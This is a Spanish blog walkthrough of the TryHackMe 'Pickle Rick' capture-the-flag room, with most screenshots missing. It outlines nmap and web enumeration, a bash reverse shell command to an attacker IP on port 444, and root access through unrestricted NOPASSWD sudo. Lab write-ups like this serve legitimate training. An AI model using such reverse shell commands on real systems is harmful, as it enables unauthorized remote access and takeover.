PICKLE RICK
Rick Álvarez (aka r1cky_r3x)
Camino hacia el eJPTv2
Pre-Configuración TryHackMe
Nota: como aun no tengo el Premium de TryHackMe, si no coincide la IP es por que la volvía a iniciar.
Reconocimiento
Ping, IP y SO:
Enumeración
Quick scan:
Targetted Ports
Es momento de enumerar los puertos:
Puerto 22:
Nmap script ssh-*
Puerto 80:
Nmap http-enum
Whatweb
Sitio web
Código fuente:
Vamos a ver que más encontramos:
Vale
Vamos a intentar algo:
Vamos a realizar una revshell, ya que enumerando encontre un par de cositas, pero primero la reverse shell:
En nuestra maquina de kali:
Nos ponemos en escucha en el puerto 444
Vamos a ver cual es nuestra IP:
Explotación
En la maquina victima, ejecutamos el comando:
bash -c 'bash -i >& /dev/tcp/10.6.22.89/444 0>&1'
Ejecutamos y:
Parece que se quedo colgada la pagina...
pero ...
Post-Explotación
Vamos a ver si tenemos SUDO:
Pues si y parece ser que tenemos acceso a todo!
Archivos de interés:
Root + 1er bandera:
Nota: como podemos ejecutar sudo para cualquier comando [(ALL) NOPASSWD: ALL], hemos podido hacer un "sudo su" y de esta manera nos convertimos en root directamente..
2da bandera:
3ra bandera:
Comentarios
Publicar un comentario